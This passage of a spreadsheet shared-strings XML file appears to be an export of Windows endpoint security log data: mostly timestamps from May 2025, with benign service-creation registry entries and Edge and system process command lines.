    <t>May 9, 2025 @ 13:21:12.948</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:12.964</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:12.980</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:12.996</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:13.015</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:13.036</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:13.045</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:13.061</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:13.076</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:13.093</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:13.108</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:13.124</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:13.144</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:13.145</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:13.157</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:13.173</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:13.189</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:13.205</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:13.221</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:13.237</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:13.252</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:13.268</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:13.284</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:13.298</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:13.314</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:13.329</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:19.537</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:19.967</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:20.007</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:22.133</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:22.150</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:22.583</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:33.007</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:33.020</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:33.052</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:33.071</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:33.136</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\AarSvc_b2973\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k AarSvcGroup -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:34.057</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:34.069</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:34.095</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:34.111</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:34.134</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_b2973\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k BcastDVRUserService</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:34.138</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:34.162</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:34.167</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_b2973\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k BthAppGroup -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:34.171</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:34.179</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\CaptureService_b2973\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k LocalService -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:34.183</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:34.196</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_b2973\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k ClipboardSvcGroup -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:34.208</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_b2973\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:34.233</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\CloudBackupRestoreSvc_b2973\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:34.242</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_b2973\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k DevicesFlow</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:34.247</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_b2973\\ImagePath binary is: C:\\WINDOWS\\system32\\CredentialEnrollmentManager.exe</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:34.279</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_b2973\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k DevicesFlow -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:34.309</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_b2973\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k DevicesFlow</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:34.360</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_b2973\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k DevicesFlow</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:34.433</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\MessagingService_b2973\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:34.461</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\NPSMSvc_b2973\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k LocalService -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:34.543</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_b2973\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:34.591</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\P9RdrService_b2973\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k P9RdrService -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:34.637</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\PenService_b2973\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k PenService</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:34.690</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_b2973\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:34.733</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_b2973\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k PrintWorkflow</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:34.753</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\UdkUserSvc_b2973\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UdkSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:34.783</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_b2973\\ImagePath binary is: C:\\WINDOWS\\System32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:34.932</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_b2973\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:34.979</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\webthreatdefusersvc_b2973\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:35.001</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_b2973\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:35.295</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:35.333</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:35.357</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:35.367</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:35.435</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:35.469</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:35.529</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:37.004</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:38.518</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:39.583</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:40.669</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:40.712</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:40.744</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:40.762</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:40.887</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:41.017</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:42.233</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:42.505</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:42.753</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:45.220</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:45.225</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:45.230</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:46.483</t>
  </si>
  <si>
    <t>\"C:\\Program Files\\WindowsApps\\MicrosoftWindows.Client.WebExperience_525.10401.30.0_x64__cw5n1h2txyewy\\Dashboard\\Widgets.exe\" -ServerName:Microsoft.Windows.DashboardServer</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:46.486</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:48.629</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:51.279</t>
  </si>
  <si>
    <t>/QuitInfo:0000000000000B00;0000000000000B08;</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:52.472</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:52.554</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:52.557</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:56.295</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:56.316</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:58.205</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:58.247</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:58.248</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:59.105</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:59.403</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:59.412</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:59.420</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:02.747</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:04.200</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:04.209</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:04.210</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:04.244</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:04.324</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:05.321</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:05.630</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:06.824</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=crashpad-handler \"--user-data-dir=C:\\Users\\carol\\AppData\\Local\\Microsoft\\Edge\\User Data\" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler \"--database=C:\\Users\\carol\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad\" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=136.0.7103.49 \"--annotation=exe=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=136.0.3240.50 --initial-client-data=0x278,0x27c,0x280,0x274,0x1dc,0x7ffb4b7d7088,0x7ffb4b7d7094,0x7ffb4b7d70a0</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:06.830</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:06.834</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=gpu-process --no-pre-read-main-dll --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2340,i,6060090785297826930,4527760222078284358,262144 --variations-seed-version --mojo-platform-channel-handle=2336 /prefetch:2</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:06.838</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2340,i,6060090785297826930,4527760222078284358,262144 --variations-seed-version --mojo-platform-channel-handle=2560 /prefetch:11</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:06.871</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:06.877</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-GB --service-sandbox-type=service --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2340,i,6060090785297826930,4527760222078284358,262144 --variations-seed-version --mojo-platform-channel-handle=2796 /prefetch:13</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:07.800</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:07.807</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=PooledProcess2 --lang=en-GB --service-sandbox-type=utility --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2340,i,6060090785297826930,4527760222078284358,262144 --variations-seed-version --mojo-platform-channel-handle=4524 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:09.377</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\136.0.3240.50\\identity_helper.exe\" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2340,i,6060090785297826930,4527760222078284358,262144 --variations-seed-version --mojo-platform-channel-handle=4544 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:09.387</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:10.912</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:10.952</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:12.287</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:12.329</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:13.281</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:13.295</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:15.074</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\ossec-agent\\win32ui.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:15.076</t>
  </si>
  <si>
    <t>consent.exe 1164 538 0000023E41FFE710</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:15.562</t>
  </si>
  <si>
    <t>/QuitInfo:0000000000000ACC;00000000000005C8;</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:17.870</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:19.817</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:35.053</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:36.998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</si>
  <si>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--field-trial-handle=2340,i,6060090785297826930,4527760222078284358,262144 --variations-seed-version --mojo-platform-channel-handle=5180 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:37.008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</si>
  <si>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--field-trial-handle=2340,i,6060090785297826930,4527760222078284358,262144 --variations-seed-version --mojo-platform-channel-handle=1520 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:37.009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</si>
  <si>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--field-trial-handle=2340,i,6060090785297826930,4527760222078284358,262144 --variations-seed-version --mojo-platform-channel-handle=5172 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:40.857</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:22:49.551</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:23:00.259</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:23:00.274</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:23:00.281</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:23:00.330</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:23:00.382</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:23:01.854</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:23:01.881</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:23:01.925</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:23:01.926</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:23:01.927</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:23:03.186</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:23:03.267</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:23:03.393</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:23:03.396</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\uus\\packages\\preview\\AMD64\\MoNotificationUx.exe /ClearActiveNotifications /CV t2OS5ybenEm3CCuX.1.0.0</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:23:04.717</t>
  </si>
  <si>
    <t>\"C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe\" -ServerName:microsoft.windows.immersivecontrolpanel</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:23:04.726</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\ApplicationFrameHost.exe -Embedding</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:23:07.639</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-GB --service-sandbox-type=service --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2340,i,6060090785297826930,4527760222078284358,262144 --variations-seed-version --mojo-platform-channel-handle=5212 /prefetch:14</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-GB --service-sandbox-type=service --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2340,i,6060090785297826930,4527760222078284358,262144 --variations-seed-version --mojo-platform-channel-handle=5308 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:23:07.646</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:23:08.898</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:23:08.939</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:23:11.688</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:23:36.014</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:23:56.195</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:23:57.743</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:07.002</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.26100.3624 --no-pre-read-main-dll --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2340,i,6060090785297826930,4527760222078284358,262144 --variations-seed-version --mojo-platform-channel-handle=816 /prefetch:10</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:19.802</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:28.789</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:29.557</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:29.565</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\wbem\\unsecapp.exe -Embedding</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:29.567</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:29.609</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:30.446</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:30.453</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:30.464</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:32.157</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:32.449</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:32.456</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:32.462</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:32.467</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:32.471</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:32.477</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:32.496</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:32.500</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:32.917</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:32.925</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:32.935</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:32.941</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:32.945</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:32.951</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:32.956</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:32.959</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:33.061</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:33.062</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:33.063</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:33.064</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:33.066</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:33.073</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:33.074</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:33.076</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:33.083</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:33.090</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:33.097</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:33.103</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:33.609</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:33.610</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:33.611</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:33.674</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:33.750</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:33.752</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:33.754</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:33.919</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:33.936</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:33.951</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:33.968</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:33.982</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:33.998</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.020</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.030</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.126</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.128</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.129</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.177</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.193</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.198</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.201</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.203</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.206</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.209</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.236</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.246</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.248</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.254</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.257</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.264</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.268</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.270</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.272</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.275</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.283</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.294</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.308</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.316</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.351</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.569</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.571</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.574</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.607</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.629</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:34.668</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:35.044</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:35.048</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:35.054</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:35.146</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:35.148</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:35.152</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:35.155</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:24:35.157</t>
  </si>
  <si>
